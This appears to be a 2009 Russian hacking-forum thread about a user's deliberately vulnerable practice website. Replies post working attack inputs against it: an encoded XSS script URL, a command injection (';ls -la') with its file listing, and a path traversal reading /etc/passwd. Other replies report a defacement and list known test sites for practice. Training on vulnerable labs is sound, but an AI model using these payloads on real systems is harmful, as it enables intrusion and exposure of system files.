ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Площадка для тренировки по взлому
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Площадка для тренировки по взлому
  #1  
Старый 23.12.2009, 21:38
Аватар для <Cyber-punk>
<Cyber-punk>
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542

Репутация: 94
Отправить сообщение для <Cyber-punk> с помощью ICQ
По умолчанию Площадка для тренировки по взлому
Площадка для тренировки по взлому.
Имеется 3 уровня сложности.
Что не работает пишем суда.

-------------------------------------------
Взламывай на здоровье ! (В.Н.З.)
--------------------------------------------
 
Ответить с цитированием

  #2  
Старый 23.12.2009, 22:00
Аватар для Belov
Belov
Познающий
Регистрация: 04.08.2008
Сообщений: 78
Провел на форуме:
355598

Репутация: 7
Отправить сообщение для Belov с помощью ICQ
По умолчанию
Код:
http://tortop.msk.ru/xss.php?name=%3c%53%43%52%49%50%54%3e%61%6c%65%72%74%28%2f%42%65%6c%6f%76%2f%2e%73%6f%75%72%63%65%29%3c%2f%53%43%52%49%50%54%3e
 
Ответить с цитированием

  #3  
Старый 23.12.2009, 22:02
Аватар для lukmus
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
Провел на форуме:
1410429

Репутация: 214


По умолчанию
признаю свою ошибку, не видел выбор уровня
Последний раз редактировалось lukmus; 23.12.2009 в 22:15..
 
Ответить с цитированием

  #4  
Старый 23.12.2009, 22:06
Аватар для lukmus
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
Провел на форуме:
1410429

Репутация: 214


По умолчанию
;ls -la
total 716
drwx------ 8 whatthis customers 4096 Dec 23 20:07 .
drwx------ 3 whatthis customers 4096 Sep 14 13:49 ..
-rw------- 1 whatthis customers 143 Dec 23 20:07 .htaccess
-rw------- 1 whatthis customers 2517 Dec 23 20:07 CHANGELOG.txt
-rw------- 1 whatthis customers 32485 Dec 23 20:07 COPYING.txt
-rw------- 1 whatthis customers 553472 Nov 13 14:38 MyProxy.exe
-rw------- 1 whatthis customers 3194 Dec 23 20:07 README.txt
-rw------- 1 whatthis customers 1538 Dec 23 20:07 SQLi.php
-rw------- 1 whatthis customers 383 Dec 23 20:07 about.php
drwx------ 2 whatthis customers 4096 Nov 28 22:51 admin
drwx------ 3 whatthis customers 4096 Dec 23 20:23 board
-rw------- 1 whatthis customers 1391 Dec 23 20:07 brute.php
drwx------ 2 whatthis customers 4096 Sep 14 13:49 cgi-bin
-rw------- 1 whatthis customers 152 Dec 23 20:07 config.php
-rw------- 1 whatthis customers 1274 Dec 23 20:07 csrf.php
-rw------- 1 whatthis customers 1112 Dec 23 20:07 exec.php
-rw------- 1 whatthis customers 358 Dec 23 20:07 fi.php
-rw------- 1 whatthis customers 711 Dec 23 20:07 fi_content.php
drwx------ 5 whatthis customers 4096 Dec 23 20:07 includes
-rw------- 1 whatthis customers 911 Dec 23 20:11 index.php
-rw------- 1 whatthis customers 1434 Dec 23 20:07 main.css
-rw------- 1 whatthis customers 20594 Nov 13 14:39 myproxy.zip
-rw------- 1 whatthis customers 148 Dec 23 20:07 php.ini
-rw------- 1 whatthis customers 19 Dec 23 20:07 phpinfo.php
drw-rw-rw- 6 whatthis customers 4096 Oct 14 19:59 quest
-rw------- 1 whatthis customers 25 Dec 23 20:07 robots.txt
-rw------- 1 whatthis customers 831 Dec 23 20:07 security.php
-rw------- 1 whatthis customers 2024 Dec 23 20:07 setup.php
-rw------- 1 whatthis customers 757 Dec 23 20:07 upload.php
drwx------ 2 whatthis customers 4096 Dec 23 21:00 uploads
-rw------- 1 whatthis customers 1775 Dec 23 20:07 xss.php
 
Ответить с цитированием

  #5  
Старый 23.12.2009, 22:07
Аватар для Belov
Belov
Познающий
Регистрация: 04.08.2008
Сообщений: 78
Провел на форуме:
355598

Репутация: 7
Отправить сообщение для Belov с помощью ICQ
По умолчанию
http://tortop.msk.ru/dvwa/includes/source/fi_source.php

Ошибка. Ссылка не работает.
 
Ответить с цитированием

  #6  
Старый 23.12.2009, 22:12
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Ну если я ограничился просто добавлением die(); то другие могли снести сайт под корень, совсем не продумал ты ничего, фактически оставил шелл на сайте, а ведь у тебя там есть и другие проекты (к примеру naume.ru) к которым можно перелезть, залив шелл на сайт для тренинга.

P.S. а ну вот видишь теперь кто то уже написал "Haked by Webkill".
P.P.S. могу бы хотя бы права на запись убрать для начала.
Ну а вообще смысла в идеи не вижу.
Последний раз редактировалось Grey; 23.12.2009 в 22:16..
 
Ответить с цитированием

  #7  
Старый 23.12.2009, 22:37
Аватар для Belov
Belov
Познающий
Регистрация: 04.08.2008
Сообщений: 78
Провел на форуме:
355598

Репутация: 7
Отправить сообщение для Belov с помощью ICQ
По умолчанию
эх я отошел не дали мне время )
 
Ответить с цитированием

  #8  
Старый 23.12.2009, 22:37
Аватар для <Cyber-punk>
<Cyber-punk>
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542

Репутация: 94
Отправить сообщение для <Cyber-punk> с помощью ICQ
По умолчанию
БАЛИН сайт для тренировки а не для того чтобы всё изговнеть Понял webkill !!!!
 
Ответить с цитированием

  #9  
Старый 23.12.2009, 23:03
Аватар для Belov
Belov
Познающий
Регистрация: 04.08.2008
Сообщений: 78
Провел на форуме:
355598

Репутация: 7
Отправить сообщение для Belov с помощью ICQ
По умолчанию
http://tortop.msk.ru/fi.php?page=../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #10  
Старый 24.12.2009, 00:15
Аватар для c0n Difesa
c0n Difesa
Участник форума
Регистрация: 01.01.2009
Сообщений: 144
Провел на форуме:
89680

Репутация: 154
По умолчанию
Online-ресурсы для проведения аудита (читай: площадки для тренировки по взлому):

1) тестовые сайты от Acunetix:

- http://testphp.acunetix.com/ (PHP);
- http://testasp.acunetix.com/ (ASP);
- http://testaspnet.acunetix.com/ (ASP.NET);

2) тестовый сайт от HP: http://zero.webappsecurity.com/banklogin.asp?serviceName=FreebankCaastAccess&temp lateName=prod_sel.forte&source=Freebank&AD_REFERRI NG_URL=http://www.Freebank.com

3) тестовый сайт от IBM: http://demo.testfire.net/

Сборки уязвимых web-приложений (для самостоятельной установки):

1) Stanford SecuriBench: http://suif.stanford.edu/~livshits/securibench/
2) OWASP WebGoat: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

3) Mutillidae: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10


Цитата:
Сообщение от <Cyber-punk>  
БАЛИН сайт для тренировки а не для того чтобы всё изговнеть Понял webkill !!!!
Проекты аналогичной тематики рассчитаны на аудиторию, от которой можно ожидать всего что угодно, поэтому и проектируются они stand-alone от рабочих проектов.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Телефонные шалости: хакерский подход к IP-телефонии [Dead]Demon Статьи 0 22.11.2009 16:03
Начальный практикум в Code Igniter Kuzya Авторские статьи 9 20.02.2009 23:12
О законе. _-[A.M.D]HiM@S-_ Статьи 28 01.11.2007 12:25
Редактирование содежимого прошивок для Самсунгов Digimortal Схемы и программы 3 28.02.2007 14:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ